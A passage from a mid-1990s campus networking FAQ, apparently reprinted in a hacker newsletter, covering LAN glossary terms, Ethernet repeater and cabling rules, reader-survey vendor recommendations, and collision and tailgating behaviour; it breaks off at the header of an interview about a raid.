             outside North America.  Some of the SDH and SONET standards are
             identical.  Standardized by the CCITT.
      
           Shielded Twisted Pair - a type of twisted-pair cable with a
             metallic shield around the twisted conductors.  The shield
             reduces the noise from the cable and reduces the effects of
             noise on the communications in the cable, but changes the
             electrical characteristics of the cable so some equipment
             optimized to non-shielded cable runs worse on shielded cable.
      
           Single Mode fiber - a type of fiber optic cable used for longer
             distances and higher speeds, e.g.  for long-distance telephone
             lines.  See also "Multimode Fiber".
      
           SMF-PMD - FDDI "Single-Mode Fiber" PMD.  Runs further than PMD.
      
           SMTP "Simple Mail Transfer Protocol" - the protocol in the
             TCP/IP family used to transfer electronic mail between
             computers.  It is not oriented towards a client/server system so
             other protocols (see "POP") are often used in that context.
             However, servers will use SMTP if they need to transfer a
             message to another server.
      
           SNMP "Simple Network Management Protocol" - Originally developed
             to manage IP based network equipment like routers and bridges,
             now extended to wiring hubs, workstations, toasters, jukeboxes,
             etc.  SNMP for IPX and AppleTalk under development.  Widely
             implemented.  See CMIP.
      
           SONET "Synchronous Optical Network" - A set of standard
             fiber-optic-based serial standards planned for use with ATM in
             North America.  Developed by Bellcore.  Different types of SONET
             run at different speeds (OC1 runs at 51Mbps, OC3 runs at
             155Mbps, OC12 runs at about 600Mbps, OC48 runs at over 2Gbps),
             and use different types of fiber (OC3 has several variants for
             use with different fibers & different distances; there are
             versions for both single mode and multimode fiber).
      
           SQE Test "Signal Quality Error Test" - an IEEE 802.3 function
             that tests the transceiver.  The term "SQE" is often (wrongly)
             used interchangeably with "Heartbeat" which is a similar
             function of Ethernet Version 2.  See Question on SQE/Heartbeat
             below.
      
           STP - Shielded Twisted Pair
      
           STS-3c UNI - ATM Forum SONET STS-3c UNI, 155.52Mbps.
      
           Switched Ethernet - really the same as Ethernet as far as
             standards go: acts like a very fast multiport Ethernet bridge
             giving an Ethernet to each station.  Presumably based on
             10BASE-T for most stations.
      
           Switched FDDI - really the same as FDDI as far as standards
             go: acts like a very fast multiport FDDI bridge.  Basically the
             DEC GigaSwitch.
      
           T1 - A phone-company standard for running 24 digitized voice
             circuits through one 1.5megabit/second digital channel.  Since
             phone companies run lots of T1, and will run T1 between customer
             sites, the standard is often used for data communications,
             either to provide 24 low-speed circuits, or to provide 1
             high-speed circuit, or to be divided other ways.
      
           TAXI - "Transparent Asynchronous Transmitter-Receiver Interface"
             Two ATM UNI specifications developed by Fore.  The slower one
             ran at 100Mbps and borrowed the physical characteristics of FDDI
             and has been adopted by the ATM Forum as its 100Mbps UNI
             specification.  The faster one ran at 140Mbps.
      
           TCP/IP "Transmission Control Protocol/Internet Protocol" -
             literally, two protocols developed for the Defense Data Network
             to allow their ARPANET to attach to other networks relatively
             transparently.  The name also designates the entire family of
             protocols built out of IP and TCP.  The Internet is based upon
             TCP/IP.
      
           TELNET - a protocol in the TCP/IP family that is used for
             "remote login".  The name is also often used as the name of the
             client program that utilizes the TELNET protocol.
      
           Terminal Server - a network device that allows a number of
             terminals to attach to a LAN, and do remote logins across the
             LAN.
      
           ThickWire - "ThickWire" Ethernet or IEEE 802.3 10BASE5.
      
           ThinWire - ThinWire Ethernet or IEEE 802.3 10BASE2.
      
           TN3270 - A variant of the TELNET program that allows one to
             attach to IBM mainframes and use the mainframe as if you had a
             3270 or similar terminal.
      
           Token Ring - People often use the term "Token Ring" to designate
             IEEE 802.5 (see above).  In the more general sense of the
             phrase, a token ring is a type of LAN that has stations wired in
             a ring, where each station constantly passes a special message
             (a "token") on to the next.  Whoever has the token can send a
             message.
      
           TP - "Twisted Pair".
      
           TP-PMD - FDDI "Twisted Pair Physical Layer Medium".  ANSI
             specification for FDDI-like service over UTP.  Being
             standardized by ANSI X3T9.5.  Was X3T9/93-130 X3T9.5/93-022
             TP-PMD/306 Rev 2.0, now there is a Rev 2.1.  Uses MLT-3 encoding
             instead of CDDI's NRZI encoding.
      
           Tunneling - An important concept in the design of many kinds of
             networks: taking some protocol-family's ability to move packets
             from user to user, or to open virtual-circuits between users,
             and use this as if it were a data-link protocol to run another
             protocol family's upper layers (or even the same protocol
             family's upper layers).  Examples: running TCP/IP over AppleTalk
             instead of something like Ethernet; running AppleTalk over
             DECNet instead of something like Localtalk or Ethernet.
      
           Twisted Pair - The type of wire used by the phone company to wire
             telephones -- at least over distances like between your house
             and the central office.  It has two conductors, which are
             twisted.  The twists are important: they give it electrical
             characteristics which allow some kinds of communications
             otherwise not possible.  Ordinary telephone cables are not
             shielded (see "Shielded twisted Pair").
      
           Type1 - IBM Type 1 STP.  The most usual type of Shielded Twisted
             Pair in LAN communications.
      
           UNI - ATM Forum "User to Network Interface".  See ATM.
      
           UTP (Unshielded Twisted-Pair) -  See "Twisted-Pair" and "Shielded
             Twisted-Pair".
      
           X.400, X.500 - OSI protocols for mail and directory services.
      
        V. Frequently Asked Questions on Campus Networks
      
           It is hard to answer typical BIG-LAN questions in advance for two
           reasons.  Answers are often long and they are often
           controversial.  To provide some sort of objective information
           relevant to the controversies, a survey of BIG-LAN readers was
           taken on answers to various questions, so this memo could offer a
           sampling of opinions.  Note that the opinions below are extracted
           from the 41 responses received for the survey.  We can't say these
           41 responses represent a fair sampling of campus LAN
           administrators, but they do show some of the answers that you
           would get if you posed some of these questions to the BIG-LAN
           readership.
      
        1. What is the difference between Ethernet and IEEE 802.3?
      
           Ethernet ran through an evolution starting with some experimenting
           at Xerox, and ending with a standard published by Xerox, DEC, and
           Intel, which they offered to the world (with minimal royalties) as
           a standard technology for building LANs.  The Institute of
           Electrical & Electronic Engineers took this as a proposed
           standard, and rewrote the protocol description making some
           clarifications and a few changes.  Some of the changes have been
           universally adopted, and others have not.  After the first go
           round of IEEE standard defining, Ethernet version 2 was introduced
           which brought it more into line with standards.  The basic
           differences are:
      
               - Heartbeat vs SQE (see below) - Which pin in the MAU & AUI
               connectors carry the ground conductor - Packet Length Field vs
               Type Field
      
           The latter issue is the one in which IEEE 802.3 has not displaced
           Ethernet.  Ethernet had a 16-bit field which defined the type of
           packet (examples: IP, XNS, AppleTalk).  The IEEE committee decided
           to use that field to specify the length of the packet, and have
           the data-portion of the packet define itself through the next
           higher level of protocol (e.g., IEEE 802.2).  However, the sets of
           possible values for that field used by the two different protocols
           are completely separate, and both protocols are designed to
           deliberately ignore packets with fields outside their own sets of
           values.  Thus Ethernet and IEEE 802.3 packets can coexist on the
           same cable, though a computer which expects to get packets
           belonging to just one of the protocols won't notice any packets
           sent according to the rules of the other (the expression used is
           "they pass by each other like ships in the night").
      
           These days, LANs use both.  There is a way to send TCP/IP packets
           via 802.3, but when 802.3 was introduced, there were already so
           many systems using the Ethernet rules that the use of
           Ethernet-style packets for TCP/IP has persisted now for years.
      
        2. What is encapsulation?  What do I have to know about it?
      
           One encapsulation issue on LANs is whether IEEE 802.3 packets are
           used or Ethernet packets are used to encapsulate your traffic on
           your IEEE 802.3/Ethernet LAN.  See previous question for more
           explanation.  Most TCP/IP systems use Ethernet, any that uses IEEE
           802.3 by default might surprise you by not interoperating with the
           rest of your TCP/IP network.
      
           A second encapsulation issue on IEEE 802.3/Ethernet networks is
           whether your Novell (IPX) packets use Novell's default
           encapsulation or whether they use Ethernet-style encapsulation.
           Novell, at least for a long time, had the distinction of using
           IEEE 802.3 as if it were the only protocol on the network, not
           following the rules for avoiding other protocols running under
           IEEE 802.3 rules.  They offered a utility called ECONFIG that
           changed Netware to use Ethernet rules, and use them properly, so
           Novell IPX packets could utilize the same LAN as other protocols.
           In no case would the Novell traffic bother Ethernet traffic-- only
           any other IEEE 802.3 traffic if ECONFIG wasn't used.  In any case,
           a single Ethernet segment, or bridged segments, had to have all
           Novell servers and clients configured the same, in order to
           interoperate.
      
           A third encapsulation issue stems from Berkeley Unix 4.2, from
           which many versions of Unix and many TCP/IP implementations have
           been modeled.  It used, by default, its own encapsulation rules
           (i.e., manner of putting IP packets within Ethernet packets) which
           is termed "Trailer Encapsulation".  When an Ethernet had some
           computers using Trailer Encapsulation and some not, TCP/IP
           connections would often work, but hang when large data transfers
           were taking place.  The next version of Berkeley Unix, version
           4.3, remedied this by avoiding Trailer Encapsulation except when
           it was guaranteed to work correctly.
      
           A fourth encapsulation issue is "tunneling", which consists of
           one of the layers in the protocol stack mimicking another layer to
           provide a way of running a different set of upper layers than
           would otherwise be possible.  This is rather widely used and
           seldom explained to beginners.  It is perhaps best explained with
           an actual example:
      
           [Here put an example, perhaps AppleTalk over IP]
      
           [Include "encapsulated bridging" as a second example]
      
        3. How do I know whether to use a router or a bridge?
      
           (Note that the answer to this question is oriented to
           Ethernet-based LANs).  Few administrators of networks doubt that a
           network can be large enough to require routers nor that there are
           situations where a bridge is an effective solution.  However,
           there is controversy as to where to draw the line.  Campus-sized
           networks involving distances of up to a mile and possibly
           thousands of stations, can be, and have been built solely out of
           one or the other.  The BIG-LAN Survey of 12/93 showed the
           following opinion among respondents:
      
             Survey question: "When you build a campus network, do you tend
             to use bridges as opposed to routers?"
      
             Answers: 13 said yes; 45 said no; 10 said some of each.
      
           Some clear tradeoffs: routers generally have to be set up no
           matter what whereas bridges can be plug-and-play on a network
           without too much total traffic; bridges generally have a higher
           speed-to-cost ratio and the low-end bridge is less expensive than
           the low-end router; routers handle huge networks with links of
           different speeds better.
      
        4. How do I know whether to use a bridge or a repeater?  How many
           repeaters may I put on an Ethernet?
      
           [Note: with the advent of 10BASE-F, this section needs updating.
           -ed]
      
           You cannot keep plugging more repeaters and add more cables to an
           Ethernet indiscriminately and expect it to work.  With too large a
           networks, the protocol which keeps the number of collisions down
           (known as CSMA/CD) fails to do that.  The protocol documents
           supply rules-of-thumb which, if followed, prevent this from
           occurring.  If you break them, you may be risking large
           performance degradations.
      
           The latest version of the rules-of-thumb (which have been updated
           over time as new features like 10BASE-T have been added to the
           protocol) are in the IEEE 802.3 document describing 10BASE-T,
           specifically IEEE Std 802.ei-1990 in the section called "System
           Considerations for Multisegment 10 Mb/s Baseband Networks".
           The rules refer to the piece of the LAN that is between repeaters
           as a segment and refer to 4 kinds: 10BASE5 (i.e. "classic"
           Ethernet) and 10BASE2 (i.e., ThinWire Ethernet) both classified as
           "Coax" segments and FOIRL (fiber inter-repeater links) and
           10BASE-T, both classified as "Link" segments, and both of which
           have the property that you can attach things only to their ends.
           The basic repeater rule is that between any two stations on the
           LAN, there may be at most 4 repeaters and three coax segments.  In
           addition, there are length restrictions on the segments which are
           designed to keep CSMA/CD working properly:
      
              10BASE5         500 meters
              10BASE2         185 meters
              FOIRL           500 meters (1000 meters in some cases)
              10BASE-T        100 meters (or more)
      
           FOIRL links can be 1000 meters if you have at most 3 repeaters
           between stations instead of 4.  10BASE-T links can be longer if
           the cable will support it: CSMA/CD is not the limiting factor on
           10BASE-T.  For the purposes of this discussion, bridges, routers,
           and gateways are "stations" since the CSMA/CD protocol does not
           pass through them.  Thus if you discover these rules prevent you
           from putting a repeater in the network where you need one, then
           you can put a bridge there instead, or perhaps split the LAN
           somewhere else using a bridge.
      
        5. Should I use "manageable" hubs, concentrators, etc on my LAN?
      
           This is a controversial question also.  Vendors have attempted to
           make hubs and concentrators that require little training &
           manpower to manage & troubleshoot, and they will attempt to
           convince you that they have succeeded.  You pay a premium for
           "manageability".  Those who remain skeptical wonder how much the
           management features are ever used: for example, management allows
           you to turn on & off ports from an operator's console; how often
           do you need to do such a thing?  Also, some of the benefits
           attributed to management packages are simply due to good record
           keeping, something which the administrator must find the manpower
           to accomplish with a management package or without one (presumably
           with a simple dbms, which can often be tailored more to the
           administrators needs).
      
        6. Which LAN technology should I use?  Arcnet?  FDDI?  Token Ring?
           10BASE-T?
      
           A controversial question.  Some questions & answers from the 12/93
           BIG-LAN Reader Survey:
      
             "When you install a LAN, which "Technology" (e.g.  Ethernet,
             Token Ring) do you prefer?"
      
             All respondents said Ethernet through three also said FDDI
             is good.
      
             "If you have experience with two or more LAN technologies, which
             have you found works better?"
      
             Answers received:
             Ethernet works best                18
             10BASE-T is best                    6
             Ethernet & FDDI work best           3
             Ethernet is better than Token Ring  2
             Ethernet costs less than FDDI       2
             Localtalk better than 10BASE-T      1
             FDDI is best                        1
             Ethernet is better than Pronet-10   1
             Ethernet is better than ARCNet      1
             Ethernet is better than PhoneNet    1
             Ethernet followed by FDDI           1
             Ethernet & Token Ring equal         1
             Depends on how they are maintained  1
      
        7. What is the ideal cable to install in a new building?
      
           Distribution runs, i.e., phone closet to room: Best possible thing
           to do is to leave usable pathways for future expansion.  Whatever
           you do, install at least 2 pair and probably 4 pair of data grade
           unshielded twisted pair.  It will always have uses.  Install
           something else too if you are tied to a particular vendor.
           Multimode fiber might become popular in the future but that is a
           gamble.
      
           Riser runs, i.e., phone closet to phone closet: it is imperative
           to leave usable pathways for future expansion.  For Ethernet,
           ThinWire is a usable riser cable, multimode fiber is possible
           too.
      
        8. What is the ideal cable to install between buildings on a campus?
      
           Trunks, i.e., cables into the building: pathways for future
           expansion very valuable.  Multimode fiber is useful, run 24 fibers
           if you can.  Use cable with some single mode too.  Run several
           times what you need initially and leave a lot of the unused fiber
           unterminated for the time being.  Cable pulling & termination are
           much more costly than the cable itself.
      
        9. Whose routers are recommended?
      
           Question & answer from the 12/93 BIG-LAN Reader Survey:
      
             "Name some router vendors whose routers you have used and
             recommend:"
      
             Cisco got 55 mentions; Wellfleet 9; Proteon 8; 3Com 3; Novell 3;
             Xyplex 3; Network Systems 2; DEC 2; HP 2; NAT 2; Retix 1; NAC 1;
             GatorBox 1; Alantec 1; Telebit 1; Fibronics 1; Shiva 1;
             PCRoute 1.
      
        10. Whose bridges are recommended?
      
           Question & answer from the 12/93 BIG-LAN Reader Survey:
      
             "Name some bridge vendors whose routers you have used and
             recommend:"
      
             DEC got 11 mentions; 3Com 8; Cabletron 5; Retix 5; Xyplex 5; HP
             4; Cisco 3; Gandalf 3; Wellfleet 2; D-link 1; Asante 1; ODS 1;
             Synernetics 1; PlainTree 1; Alantec 1; Artel 1; Develcon 1;
             Gandalf 1; karl-bridge 1; Allied Telesis 1; Vitalink 1; ATT 1.
      
        11. Whose Ethernet equipment are recommended?
      
           Question & answer from the 12/93 BIG-LAN Reader Survey:
      
             "Name some Ethernet concentrator/transceiver/repeater vendors
             whose Ethernet equipment you have used and recommend:"
      
             Cabletron got 30 mentions; 3Com 15; Allied Telesis 15; HP 13;
             Synoptics 11; Asante 9; Chipcom 8; DEC 7; SMC 7; David Systems
             4; Xyplex 3; Milan 2; Lantronix 2; Gandalf 2; D-Link 2; Canary
             2; ATT 2; BlackBox 2; Hughes 2; Fibermux 2; St. Clair 1;
             Pirelli-Focom 1; Pilkington 1; ODS 1; Networth 1; LANNET 1;
             Kalpana 1; Isolan 1; Interphase 1; Intel 1; IMC 1; Hirschmann 1;
             Fibercom 1; BICC 1.
      
        12. Whose Token Ring equipment are recommended?
      
           Query and answers from the 12/93 BIG-LAN Reader Survey:
      
             "Name some Token Ring equipment vendors whose Token Ring
             equipment you have used and recommend:"
      
             IBM was mentioned by 12 responders; Proteon 3; ODS 2; UB 1;
             Thomas-Conrad 1; Startek 1; Madge 1; HP 1; Cabletron 1; CSP 1.
      
        13. Whose FDDI equipment are recommended?
      
           Query and answers from the 12/93 BIG-LAN Reader Survey:
      
             "Name some FDDI equipment vendors whose FDDI equipment you have
             used and recommend:"
      
             Cisco was mentioned by 8 responders; Crescendo 7; DEC 5;
             Synoptics 3; Interphase 3; 3Com 3; Fibronics 2; Cabletron 2;
             Synernetics 1; Sun 1; SGI 1; Proteon 1; PlainTree 1; ODS 1;
             Network Peripherals 1; IBM 1; Fibermux 1; Chipcom 1.
      
        14. What PC network software is recommended?
      
           Query and answers from the 12/93 BIG-LAN Reader Survey:
      
             "Name some PC network software vendors whose PC network software
             you have used or recommend:"
      
             Novell was mentioned by 32 responders; FTP Software 21; Apple 7;
             SunSelect 6; Microsoft 5; NCSA 4; IBM 4; Banyan 4; DEC 4;
             NetManage 3; Clarkson 3; 3Com 3; Word Perfect 2; WinQVT 2;
             Reflection 2; Qualcomm 2; Brightworks 2; Beame & Whiteside 2.
      
        15. What protocols should run on a campus-wide LAN?
      
           Query and answers from the 12/93 BIG-LAN Reader Survey:
      
             "Name some protocols that you use to interconnect your campus
             that you would recommend:"
      
             TCP/IP was mentioned by 63 responders; IPX 26; AppleTalk 17;
             DECNet 7; LAT 3; VINES 2; SNA 2; CLNS 1.
      
        16. What software is recommended for managing a campus-wide LAN?
      
           Queries and answers from the 12/93 BIG-LAN Reader Survey:
      
             "Name some network management system that you use for the
             management of a campus LAN, that you recommend:"
      
             SunNet Manager was mentioned by 13 respondents; HP OpenView 8;
             Cabletron Spectrum 3; Cabletron Remote LanView 3; PSI SNMP 2;
             Netlabs 2; CiscoWorks 2.
      
             "Name other software that you use for the management of a campus
             LAN that you recommend:"
      
             Ping was mentioned by 4 respondents; Traceroute 3; SunNet
             Manager 2; Network General Sniffer 2; Neon Software NetMinder 2;
             CMU SNMP 2.
      
        17. What terminal server is recommended?
      
           Query and answers from the 12/93 BIG-LAN Reader Survey:
      
             "Name vendors of terminal servers that you use and recommend:"
      
             Cisco was mentioned by 21 respondents; Xylogics 12; Xyplex 11;
             DEC 9; Emulex 4; Spider 2; Equinox 2; Netblazer 1; Livingston 1;
             Lantronix 1; HP 1; Datability 1; Digiboard 1; Allied Telesis 1;
             3Com 1.
      
        18. Whose troubleshooting equipment are recommended?
      
           Query and answers from the 12/93 BIG-LAN Reader Survey:
      
             "Name some vendors of network troubleshooting equipment that you
             use and would recommend:"
      
             Network General was mentioned by 30 respondents; HP 11;
             MicroTest 4; Tektronix 3; Spider 3; Fluke 3; FOTEC 3; W&G 2;
             Novell 2; FTP 2; Exfo 2; Van Jacobson 1; Pentascanner 1; NCC 1;
             NAT 1; LM-1 1; Consultronics 1; Antel 1; AG Group 1.
      
        19. What security products should I buy?
      
           Query and answers from the 12/93 BIG-LAN Reader Survey:
      
             "Name some security products that you use to maintain security
             on your campus LAN that you recommend:"
      
             COPS was mentioned by 5 respondents; tcpwrapper(s) 3; SecurID 3;
             Crack 3; Cisco access control 2; xtacacs 1; npassword 1;
             Tripwire 1; Socks 1; Netware 1; Native VINES security 1; McAffee
             Anti-Virus NLM 1; HP 1; Bridges 1; Beame and Whiteside 1.
      
        20. Should the names of devices on my campus LAN have subdomains?
      
             Example of name without subdomain: bigvax.sequoia.edu; example
             with subdomain: bigvax.acs.sequoia.edu.  It is possible to run
             networks of thousands of computers without the bother of
             subdomains, but they have some advantages.
      
           Queries and answers from the 12/93 BIG-LAN Reader Survey:
      
             "For Internet names of nodes on a campus network that supports
             TCP/IP, do you prefer the use of subdomains?"
      
             49 responders said yes, 11 said no, 3 said it depends.
      
             "If you have worked on a campus that utilizes subdomains and one
             that does not, which does your experience tell you is the better
             way to administer names in a campus network?"
      
             13 responders said the LAN with subdomains worked better; 1 said
             the LAN without subdomains worked better; 2 said it doesn't
             matter and 3 said it depends.
      
        21. Should client stations use POP?  Should they use just SMTP?
            Should I use some non-TCP/IP protocol for mail to/from client
            stations?
      
           Query and answers from the 12/93 BIG-LAN Reader Survey:
      
             "For client station's mail, which do you prefer: SMTP;
             TCP/IP-based client-server protocols (e.g.  POP, POP2, etc);
             other LAN protocols?"
      
             22 responders preferred TCP/IP-based client-server protocols
             (e.g.  POP, IMAP, PCMAIL); 20 preferred SMTP; 5 preferred other
             LAN protocols; 3 said "use all three"; 3 said "SMTP and
             TCP/IP-based client-server protocols"; 3 said "SMTP and other
             LAN protocols"; 1 said "TCP/IP-based Client-server Protocols and
             other LAN protocols".
      
        22. Should I enable SQE/heartbeat?
      
           SQE Test (often labeled "SQE" by vendors) is part of IEEE 802.3
           that is designed to test part of the the MAU (transceiver)
           hardware.  It basically consists of the MAU trying out the
           collision signal line immediately after each packet it sends.
           Thus a station on the network can verify that the MAU is working
           by watching for this signal and can log an error for you if the
           signal is not present.  Correct practice is to turn SQE Test off
           on any MAU that is attached to a repeater and turn it on on any
           MAU attached to a station.  Not doing this can lead to incorrect
           repeater operation and/or a lack of logging of serious network
           errors when they occur.
      
           However, many vendors of networkable stations take no advantage of
           SQE Test (it was new to IEEE 802.3 & Ethernet Version 2, not being
           present in earlier Ethernet) and there have been many reports of
           stations that won't even work properly when it is enabled.  Thus
           your dilemma: some of your users may have stations that won't work
           unless you set your MAU's wrong.  Maybe some day all vendors will
           fall into line, or the IEEE will revise its standard to get rid of
           SQE Test.  In the mean time you are forced to know which stations
           log errors without it and which ones work poorly with it on.
           Examples of computers/networking equipment sensitive (one way or
           the other) to SQE test:
      
           Definitely can't handle SQE Test:
               No convincing confirmations
      
           Mixed & inconclusive reports saying they can't handle SQE Test:
               Some Sun workstations
               Cisco routers
      
           Needs SQE Test or it reports errors (i.e., uses SQE Test as
           intended):
               VAX/VMS
               Alpha/VMS
      
        23. If I have a thinwire network interface card, how do I connect it
            to a 10BASE-T concentrator?
      
           Ethernet standard provides only one way to do interconnect
           thinwire (10BASE2) and 10BASE-T: using a repeater (e.g. a
           concentrator).  Since this is expensive and it increases the
           repeater count, thus limiting the expanse of the rest of the
           network, customers want, and several vendors provide adaptors that
           are not real repeaters.  Typically, these allow a 10BASE-T segment
           to end in a shorter-than-usual thinwire segment.  One depends upon
           the vendor to provide instructions as to how its use affects the
           limitations on segment lengths and repeater counts.
      
        24. How much does a collision slow down an Ethernet packet?
      
           Perhaps you've noticed the phenomena that you might ask otherwise
           intelligent & knowledgeable network professionals how many
           collisions indicate too much load, and they immediately divert the
           conversation to the question of whether your network is broken.
           The implication is that they're more inclined to believe your
           Ethernet is performing poorly due to being broken than due to load.
           Here's an explanation, probably more than you ever wanted to
           know:
      
           Coaxial Ethernet was designed so that everyone shares the same
           single cable.  Electrical characteristics of transmission were
           chosen so that when more than one station places bits on the
           network, the voltages in effect "add" and the transceiver can
           sense the "unusual" voltage as a collision.
      
           Transceivers detect the collisions, and signal the stations by
           raising a "collision detect" line to the station.  According to
           the standard, transceivers signal any collision that occurs when
           it is sending a packet, and also any triple collision.
      
           The Network Interface hardware takes care of retransmissions and
           reports the collision to the driver.  It might not report complete
           information on the number of collisions--for example, one Ethernet
           chip will report after each packet it sends, whether there were 0,
           1, 2, <16, or >16 Collisions.  The driver usually keeps a count
           that it updates from the information it gets from the card.
      
           Repeaters do not "recreate" electrical collisions on other
           networks.  Any time the repeater detects a collision, it is, by
           definition, in the midst of transmitting a packet.  It can no
           longer pick up valid data off the net to continue sending the
           packet.  The Ethernet spec says it should start sending 32 bits of
           made-up data (called a JAM) that will make the packet terminate
           early, with a CRC error.  None receiving stations on the other
           side of the repeater will see "collision" signaled by their
           transceiver.  Instead, they will receive just the beginning of a
           packet.  This is called a "runt".  The network interface hardware
           could, theoretically, report a runt as a collision, which might be
           useful for some kinds of monitoring.  Or the software, might
           consider a runt a collision and increment the same count.  Or it
           can count them separately, or not count them at all.  Software
           that reports these separately from collisions usually refers to
           them as runts or JAMs.
      
           Link segments like 10BASE-T, FOIRL and 10BASE-FL attach only two
           devices and have separate paths in each direction.  Thus
           collisions are superfluous, but must still be detected and
           reported since Ethernet interfaces cannot be assumed to have the
           ability to send and receive packets at the same time.  Thus the
           transceivers watch for packets flowing in both directions at the
           same time, and signal collision to the station as well as produce
           a JAM signal on the line so that the stations trying to send the
           packets will get the message that this was a collision and the
           packet needs to be resent.
      
           Ethernet interfaces retransmit packets up to 16 times with an
           exponential backoff for the first 10.  The minimum retransmission
           time is relatively quick and the detection process takes a fixed
           amount of time, so 75% of all times that two stations are
           contending for a net are resolved with one station starting a
           successful transmission within 250 microseconds.  It is important
           to realize that Ethernet's collisions are a normal part of
           scheduling the use of the LAN, that it is used only when carrier
           sensing doesn't do the trick, and that Ethernet uses a
           third-generation scheme that handles collisions very smoothly when
           when the hardware works & is properly assembled, even under high
           loads.  A lot of mis-information is spread about collisions, often
           from people dealing with Ethernet's competitors, but also often
           from Ethernet users who simply haven't studied it too closely, or
           listened to the wrong people.
      
           A collision is always detected & taken care of (to the point of
           starting the backoff) within the first 50 microseconds of a
           packet's transmission on a correctly functioning Ethernet.  Aside
           from helping to limit the time spent dealing with collisions, this
           insures that collisions of even the smallest legal packets are
           always detected.  Some interface hardware reports late collisions,
           i.e. collisions signaled after this time:  unlike collisions,
           which are normal, late collisions are a type of error.  Note that
           on the other side of a repeater, the late collision simply looks
           like a CRC error perhaps with an alignment error.  There are two
           causes of late collisions:  faulty hardware; or the network being
           too large.  In either case, it tells you that the network is
           having a problem, and packets are almost surely being lost
           sometimes, causing unnecessary & occasionally severe performance
           penalties.  If the network is too large, properly placed routers,
           bridges (or some switches) can subdivide it into two
           properly-sized Ethernets.
      
           Can random collisions cause packets to be lost?  The exponential
           backoff algorithm yields a probability of 50% that a pair of
           colliding packets require more than one retransmission to get
           through if two stations are contending for the net at exactly the
           same time, and only 25% of the ones that still haven't succeeded
           fail to get through after the second retransmission.  For the
           16-retry limit, the calculation of the faction not making it is:
      
                        1/2 x 1/4 x .... 1/(2*10) x (1/(2*10))**6
      
           or           (1/2)**115
      
           or about     (1/10)**34.
      
           I conclude that on every Ethernet ever installed, for every packet
           sent, that this has never happened (give me a billion LANs that
           transmit a billion packets every day for a billion days and the
           odds are still a million to one against even one lost packet).
           When more than two stations are involved (i.e., more than two
           stations have something to send at exactly the same time), these
           odds aren't so overwhelming--thus I conclude that there have
           indeed been packets lost on correctly functioning Ethernets
           somewhere (Note:  also the randomness of the backoff is probably
           not perfect and I've heard of network interfaces that illegally
           stop before 16 retries!).  Recall also that stations do sense
           carrier: collisions only resolve the problem of what happens when
           the packets start at almost the same time.  Probably the most
           usual time for a collision is when two stations simultaneously see
           the end of a packet, both having a packet to send.  In this case,
           there will be more than one collision on average, but as stated
           above, 75% of the time, one of them will have started a successful
           transmission within 250usec.
      
           In contrast to the smooth handling of properly detected
           collisions, an undetected collision causes a packet to be lost,
           which must be retransmitted by software:  for example NFS is often
           set to time out at .5 seconds, so a lost packet (for example, the
           result of an undetected collision) causes a delay typically 2000
           times longer.  Networks with problems that cause undetected
           collisions, frequent unnecessary collisions, or lose packets for
           other reasons are much worse performance killers than collisions
           caused by an increase in load.
      
           How many packets can you tolerate an Ethernet losing?  1 in 100?
           1 in 1000?  1 in 10,000?  1 in 100,000?  Depends.  1 in 100 is
           very bad.  Where do you draw the line?  Back-of-an envelope
           example of the effects:  NFS often transmits blocks of 6 Ethernet
           packets, the loss of any one of which results in the
           retransmission of all 6.  The loss of one packet in 12,000 means
           that every 2,000th block takes on the order of 2000 times longer
           to complete than normal, or performance is decreased to 50% of
           that on a working Ethernet.
      
           The Ethernet's packet loss problems are relative to those of your
           router, bridge, or switch.  Routers, bridges, and switches lose
           packets when their buffers fill up, so if your
           router/bridge/switch is losing one packet in 10,000, then for
           traffic passing through the router/bridge/switch, addressing an
           Ethernet packet loss rate of 1/100,000 would have little effect,
           and addressing an Ethernet packet loss rate of 1/10,000 would help
           no more than addressing your router/bridge/switch problem.
      
        25. Should I worry about Ethernet tailgating?
      
           Tailgating is a phenomena resulting from bugs in the design
           of Ethernet interfaces, which some vendors claim are due
           to ambiguities or changes in the Ethernet specification.  There
           was indeed a change in the IEEE 802.3 specification's wording
           designed to eliminate misunderstanding.
      
           Tailgating problems consist of packets following close after
           packets, collisions, and/or noise: so close that some network
           interfaces aren't ready to receive them yet.
      
           The standard says network interfaces should wait a minimum of
           9.6us after the end of a packet before sending another (the
           "interpacket gap").  Network interfaces typically don't start
           detecting the beginning of packets for a while after the end of a
           packet (i.e. carrier goes to idle) to avoid trying to treat the
           typical noise at the end of a packet as the beginning of the next
           packet.  This has been called its "blind time".  The standard
           doesn't specify how long the blind time should be, but naturally
           it must be less than the 9.6us interpacket gap.  However on real
           products, the blind times vary between a fraction of 1us and 4us
           or longer.
      
           Another element is that some network interfaces sometimes send 24
           bits of data while the line is idle: not a real packet:  somehow
           this causes short interpacket gaps.  My guess is that it makes
           some interfaces go blind while not stopping other interfaces
           from sending immediately.
      
           Some interfaces don't wait 9.6us after a collision before sending
           a packet.
      
           There have been interfaces that cheat on the 9.6us interpacket
           gap after a packet.  This is so explicitly against the standard
           that vendors of such products have been quick to fix them.
           Some products:
      
                                                   Tailgate     Tailgate
                                 Blind    24Bit    after        after
                                 Time     Garbage  Collisions   Packets
                                 -------  -------  ----------   --------
            IBM PCMCIA           0.6us
            (Notebook Sniffer)
      
            Intel 82596          4.6us              x
            (Desktop Sniffer)
      
            SEEQ 8003                      x        x
            (Cisco, oldSGI)
      
            AMD Lance AM7990     >4us
            (Sun)
      
            Intel 82586          long               x
            (oldSun)
      
            oldKalpana                                           x
                                 -------   -------  ----------   --------
                                                    Tailgate     Tailgate
                                 Blind     24Bit    after        after
                                 Time      Garbage  Collisions   Packets
      
           (Notes: Information from InfoWorld, 11/93 and 3/94; IBM PCMCIA
           cards are highly immune to the problems; Kalpana has fixed its
           switches)
      
           Example: If a network has two Suns that have Intel 82596 Ethernet
           chips (A and B) and two other stations (C and D), you can have the
           following situation:
      
             C and D send packets which collide.
             A sends a packet to B too soon after the collision.
             B remains blind too long to receive the packet.
      
           Thus TCP, NFS, or whatever, must retransmit.  Typical NFS
           retransmission time would be in the .5 to 1 second range, thus one
           lost packet translates into .5-1 second of waiting.  TCP
           retransmission time adjusts itself to the network & is typically
           shorter between stations on the same LAN, but, for example, can be
           long if the packet is lost between a station and a router while
           the station is talking over a WAN.
      
           End of Memo: BIG-LAN Frequently Asked Questions
     
     @HWA
     
25.0  INTERVIEW:  Exclusive: Fuqrag gets raided by OSI, NASA, FBI, Interpol.     
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        
      Short interview with fuqrag after his raid last Thursday. He is to be
      indicted and is not allowed access to computer equipment, (all his
